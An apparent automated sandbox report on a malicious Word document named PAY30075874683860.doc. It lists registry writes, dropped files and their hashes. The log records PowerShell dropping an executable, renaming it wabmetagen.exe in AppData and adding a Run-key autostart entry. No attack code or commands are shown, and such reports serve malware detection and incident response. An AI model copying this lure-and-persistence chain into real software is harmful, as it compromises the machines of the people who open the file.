WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 2
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 3
0
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Security\Trusted Documents
LastPurgeTime
25876400
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
r}'
727D2700040D000006000000010000006E000000020000005E0000000400000063003A005C00750073006500720073005C00610064006D0069006E005C0064006F0077006E006C006F006100640073005C00700061007900330030003000370035003800370034003600380033003800360030002E0064006F006300000000000000
3332
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
WORDFiles
1315831848
3332
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
WORDFiles
1315831849
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Item 1
[F00000000][T01D4DA8A58706550][O00000000]*C:\Users\admin\Downloads\
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 1
[F00000000][T01D4DA8A5872D650][O00000000]*C:\Users\admin\Downloads\PAY30075874683860.doc
3332
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\1ADD04
1ADD04
04000000040D00002E00000043003A005C00550073006500720073005C00610064006D0069006E005C0044006F0077006E006C006F006100640073005C00500041005900330030003000370035003800370034003600380033003800360030002E0064006F00630015000000500041005900330030003000370035003800370034003600380033003800360030002E0064006F00630000000000010001000000000099F706558ADAD40104DD1A0004DD1A0000000000DB040000000000000000000000000000000000000000000000000000FFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFF
3412
powershell.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E
LanguageList
en-US
3412
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
0
3412
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
0
3412
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
4294901760
3412
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
4294901760
3412
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
1048576
3412
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
%windir%\tracing
3412
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
0
3412
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
0
3412
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
4294901760
3412
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
4294901760
3412
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
1048576
3412
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
%windir%\tracing
3412
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
3412
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
2260
wabmetagen.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\wabmetagen_RASAPI32
EnableFileTracing
0
2260
wabmetagen.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\wabmetagen_RASAPI32
EnableConsoleTracing
0
2260
wabmetagen.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\wabmetagen_RASAPI32
FileTracingMask
4294901760
2260
wabmetagen.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\wabmetagen_RASAPI32
ConsoleTracingMask
4294901760
2260
wabmetagen.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\wabmetagen_RASAPI32
MaxFileSize
1048576
2260
wabmetagen.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\wabmetagen_RASAPI32
FileDirectory
%windir%\tracing
2260
wabmetagen.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\wabmetagen_RASMANCS
EnableFileTracing
0
2260
wabmetagen.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\wabmetagen_RASMANCS
EnableConsoleTracing
0
2260
wabmetagen.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\wabmetagen_RASMANCS
FileTracingMask
4294901760
2260
wabmetagen.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\wabmetagen_RASMANCS
ConsoleTracingMask
4294901760
2260
wabmetagen.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\wabmetagen_RASMANCS
MaxFileSize
1048576
2260
wabmetagen.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\wabmetagen_RASMANCS
FileDirectory
%windir%\tracing
2260
wabmetagen.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
ProxyEnable
0
2260
wabmetagen.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
460000006A000000010000000000000000000000000000000000000000000000C0E333BBEAB1D301000000000000000000000000020000001700000000000000FE800000000000007D6CB050D9C573F70B000000000000006D00330032005C004D00530049004D004700330032002E0064006C000100000004AA400014AA4000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0A8016400000000000000000000000000000000000000000800000000000000805D3F00983740000008000002000000000000600000002060040000B8A94000020000008802000060040000B8A9400004000000F8010000B284000088B64000B84B400043003A000000000000000000000000000000000000000000
2260
wabmetagen.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
wabmetagen
"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe"
3404
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
CompatibilityFlags
0
3404
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
3404
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
3404
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
SecuritySafe
1
3404
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
ProxyEnable
0
3404
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
4600000069000000010000000000000000000000000000000000000000000000C0E333BBEAB1D301000000000000000000000000020000001700000000000000FE800000000000007D6CB050D9C573F70B000000000000006D00330032005C004D00530049004D004700330032002E0064006C000100000004AA400014AA4000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0A8016400000000000000000000000000000000000000000800000000000000805D3F00983740000008000002000000000000600000002060040000B8A94000020000008802000060040000B8A9400004000000F8010000B284000088B64000B84B400043003A000000000000000000000000000000000000000000
3404
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Recovery\Active
{716F59D3-467D-11E9-BAD8-5254004A04AF}
0
3404
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore
Type
4
3404
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore
Count
3
3404
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore
Time
E307030004000E001100140015005301
3404
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}\iexplore
Type
4
3404
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}\iexplore
Count
3
3404
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}\iexplore
Time
E307030004000E001100140015005301
3404
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
FullScreen
no
3404
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
Window_Placement
2C0000000000000001000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF20000000200000004003000078020000
3404
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Favorites\Links
Order
08000000020000000C01000001000000020000007E0000000000000070003200EC000000464B245120005355474745537E312E55524C0000540008000400EFBE454B974D464B24512A000000F94300000000020000000000000000000000000000005300750067006700650073007400650064002000530069007400650073002E00750072006C0000001C00000000000000820000000100000074003200E2000000464B24512000574542534C497E312E55524C0000580008000400EFBE454B864A464B24512A000000743E0000000003000000000000000000000000000000570065006200200053006C006900630065002000470061006C006C006500720079002E00750072006C0000001C00000000000000
3404
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}\iexplore
Type
3
3404
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}\iexplore
Count
3
3404
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}\iexplore
Time
E307030004000E001100140015001E02
3404
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}\iexplore
LoadTime
15
3404
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Type
3
3404
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Count
3
3404
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Time
E307030004000E001100140015004D02
3404
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
LoadTime
39
3404
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{DBC80044-A445-435B-BC74-9C25C1C588A9}\iexplore
Type
3
3404
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{DBC80044-A445-435B-BC74-9C25C1C588A9}\iexplore
Count
3
3404
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{DBC80044-A445-435B-BC74-9C25C1C588A9}\iexplore
Time
E307030004000E00110014001500AB02
3404
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{DBC80044-A445-435B-BC74-9C25C1C588A9}\iexplore
LoadTime
31
3404
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\0
Path
C:\Users\admin\Favorites\Links\Suggested Sites.url
3404
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\0
Handler
{B0FA7D7C-7195-4F03-B03E-9DC1C9EBC394}
3404
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\0
FeedUrl
https://ieonline.microsoft.com/#ieslice
3404
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\0
DisplayName
3404
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\0
ErrorState
0
3404
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\0
DisplayMask
0
3404
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\1
Path
C:\Users\admin\Favorites\Links\Web Slice Gallery.url
3404
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\1
Handler
{B0FA7D7C-7195-4F03-B03E-9DC1C9EBC394}
3404
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\1
FeedUrl
http://go.microsoft.com/fwlink/?LinkId=121315
3404
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\1
DisplayName
3404
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\1
ErrorState
0
3404
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\1
DisplayMask
0
3404
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
NotifyDownloadComplete
yes
3684
chrome.exe
delete key
HKEY_CURRENT_USER\Software\Google\Chrome\BrowserExitCodes
3684
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon
failed_count
0
3684
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon
state
2
3684
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon
state
1
3684
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}
dr
1
3684
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome
UsageStatsInSample
0
3684
chrome.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Google\Update\ClientStateMedium\{8A69D345-D564-463C-AFF1-A69D9E530F96}
usagestats
0
3684
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}
metricsid
3684
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}
metricsid_installdate
0
3684
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}
metricsid_enableddate
0
3684
chrome.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Google\Update\ClientStateMedium\{8A69D345-D564-463C-AFF1-A69D9E530F96}\_NumAccounts
aggregate
sum()
3684
chrome.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Google\Update\ClientStateMedium\{8A69D345-D564-463C-AFF1-A69D9E530F96}\_NumAccounts
S-1-5-21-1302019708-1500728564-335382590-1000
1
3684
chrome.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Google\Update\ClientStateMedium\{8A69D345-D564-463C-AFF1-A69D9E530F96}\_NumSignedIn
aggregate
sum()
3684
chrome.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Google\Update\ClientStateMedium\{8A69D345-D564-463C-AFF1-A69D9E530F96}\_NumSignedIn
S-1-5-21-1302019708-1500728564-335382590-1000
0
3684
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\StabilityMetrics
user_experience_metrics.stability.exited_cleanly
0
3684
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}
lastrun
13197057668313257
3684
chrome.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E
LanguageList
en-US
3684
chrome.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
3684
chrome.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
3684
chrome.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
ProxyEnable
0
3684
chrome.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
460000006B000000010000000000000000000000000000000000000000000000C0E333BBEAB1D301000000000000000000000000020000001700000000000000FE800000000000007D6CB050D9C573F70B000000000000006D00330032005C004D00530049004D004700330032002E0064006C000100000004AA400014AA4000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0A8016400000000000000000000000000000000000000000800000000000000805D3F00983740000008000002000000000000600000002060040000B8A94000020000008802000060040000B8A9400004000000F8010000B284000088B64000B84B400043003A000000000000000000000000000000000000000000
3684
chrome.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\Component Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}\Enum
Implementing
1C00000001000000E307030004000E001100150010009B0300000000
3684
chrome.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
WORDFiles
1315831846
3884
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\BrowserExitCodes
3684-13197057667203882
259
3716
WINWORD.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
3716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
6<(
363C2800840E0000010000000000000000000000
3716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
Off
3716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
On
3716
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
WORDFiles
1315831847
3716
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1315831954
3716
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1315831955

Files activity

Executable files
2
Suspicious files
50
Text files
60
Unknown types
6

Dropped files

PID
Process
Filename
Type
3984
272.exe
C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe
executable
MD5: 9557d821a3ec7390fb7a16485bce69e7
SHA256: 3c5572570336f6ba4b0430fcccd5ae53fdac716da321b90ba82665296e08efa4
3412
powershell.exe
C:\Users\admin\272.exe
executable
MD5: 9557d821a3ec7390fb7a16485bce69e7
SHA256: 3c5572570336f6ba4b0430fcccd5ae53fdac716da321b90ba82665296e08efa4
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000012
binary
MD5: 4636fc07cfe8024948bc4ef30dfaf796
SHA256: 6029e7ef979318e28b2686f907dbfaebdc564768e70d777cc65c0a8cbe71515a
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RF1b0a9b.TMP
binary
MD5: 4ccddf409597261dbdd956ecb1e5a8c0
SHA256: c48b553e144493e6cece6844d14851ec2ddc19d06176fcfc0e930feebcf9800e
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
binary
MD5: 4ccddf409597261dbdd956ecb1e5a8c0
SHA256: c48b553e144493e6cece6844d14851ec2ddc19d06176fcfc0e930feebcf9800e
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\temp-index
––
MD5:  ––
SHA256:  ––
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Local State~RF1b0a2e.TMP
text
MD5: 7bc4a6376d0f5de130255d1c13b4c7e6
SHA256: 846a4fddbfcdde9976a650d81d3df13db0c14a43ab571651eb7e841869a4c878
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\70e9fec7-204a-4b50-a291-22f3abb07ed0.tmp
––
MD5:  ––
SHA256:  ––
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
text
MD5: f5432bdba97b7ddfa8ac0715b971805c
SHA256: dc93b148ed7141eba7f82e63fb3c603a4f522806f75c2aa228d1bc42baf694d1
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Preferences~RF1b0432.TMP
text
MD5: f5432bdba97b7ddfa8ac0715b971805c
SHA256: dc93b148ed7141eba7f82e63fb3c603a4f522806f75c2aa228d1bc42baf694d1
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\f559eba2-efcc-4d47-bef6-767d877f408d.tmp
––
MD5:  ––
SHA256:  ––
2964
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\OICE_8764D31F-BDB1-404E-ADF5-CBB686291CE6.0\msoDC28.tmp
compressed
MD5: dce4141af5e661a147b96a6e529cf892
SHA256: 21bbb8899e1fd6149f914d73a45f68a3535c6b399b526855e2052a1514a8ec53
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\420aef3d-85b2-4a4f-954f-c147b9afe26e\index-dir\the-real-index~RF1adc48.TMP
binary
MD5: 0d9bdc384041a866ee7e0188c1d565e0
SHA256: 702e4a486e61ca5d6d405bdabef3aa152eee0b47c0d71f3eda7dd9dce72bc28e
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\420aef3d-85b2-4a4f-954f-c147b9afe26e\index-dir\the-real-index
binary
MD5: 0d9bdc384041a866ee7e0188c1d565e0
SHA256: 702e4a486e61ca5d6d405bdabef3aa152eee0b47c0d71f3eda7dd9dce72bc28e
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\420aef3d-85b2-4a4f-954f-c147b9afe26e\index-dir\temp-index
––
MD5:  ––
SHA256:  ––
3332
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\OICE_8764D31F-BDB1-404E-ADF5-CBB686291CE6.0\2954CC76.doc
document
MD5: f3f0c3ab525f0e91098b4cbe6908f31a
SHA256: 3eb82a4222e85a3bf961d094c19520e14f28142b9b58cc0ad165aaa219c788b8
3332
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\OICE_8764D31F-BDB1-404E-ADF5-CBB686291CE6.0\2954CC76.doc:Zone.Identifier
text
MD5: fbccf14d504b7b2dbcb5a5bda75bd93b
SHA256: eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913
3332
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\OICE_8764D31F-BDB1-404E-ADF5-CBB686291CE6.0\2954CC76.doc\:Zone.Identifier:$DATA
––
MD5:  ––
SHA256:  ––
3332
WINWORD.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\PAY30075874683860.doc.LNK
lnk
MD5: 3245b1ed162f244f20bc841a8d184c51
SHA256: 017d3ea3320e5bf39d4b3fb544a99e64d0f326771c8e626b6faa8fb1ac0e90e1
3332
WINWORD.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat
text
MD5: c821682c39419442e66a8da1a32c7317
SHA256: 37c9f754a7ba168264fe253d45c2db34ee2ca4fb758461306bb30679f8f31de4
3332
WINWORD.EXE
C:\Users\admin\Downloads\~$Y30075874683860.doc
pgc
MD5: df5bf5fed10279dc3c2ddefb832b9326
SHA256: 9f398b62e094c62096a9b569c71668a98008e883c1820037e3d73a20e0be34d1
3716
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\CVRD4B6.tmp.cvr
––
MD5:  ––
SHA256:  ––
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\index.txt~RF1ad12c.TMP
binary
MD5: 12511d80e357372ed3274d3950ae61c4
SHA256: d85e54fcce65cebb017cf5a5564a4f39568b8ecc43943443fe92d271d0a09216
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\e6622492fa163609ddd4212f54512baa07929ed3\index.txt.tmp
––
MD5:  ––
SHA256:  ––
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\TransportSecurity
text
MD5: 9aac8cd48cd9f31b13b146a50bf6f02c
SHA256: 57d19fac073e1e89b061aaebef98944aee0c10c8e2248f1cf6d3b01bbc04b826
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\TransportSecurity~RF1acc3a.TMP
text
MD5: 9aac8cd48cd9f31b13b146a50bf6f02c
SHA256: 57d19fac073e1e89b061aaebef98944aee0c10c8e2248f1cf6d3b01bbc04b826
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\5da06e3e-063a-44ce-89ab-c963a3b63424.tmp
––
MD5:  ––
SHA256:  ––
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Preferences~RF1acb11.TMP
text
MD5: c822ff87d8c4d5eae490df418aa063d3
SHA256: 3a1887df0e7555a86db866d20bd31d71d82a713f205d5d4a3c71b421f1692d9a
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
text
MD5: c822ff87d8c4d5eae490df418aa063d3
SHA256: 3a1887df0e7555a86db866d20bd31d71d82a713f205d5d4a3c71b421f1692d9a
3684
chrome.exe
C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\a598b869-1112-47b9-8098-f9db0113ca41.tmp
––
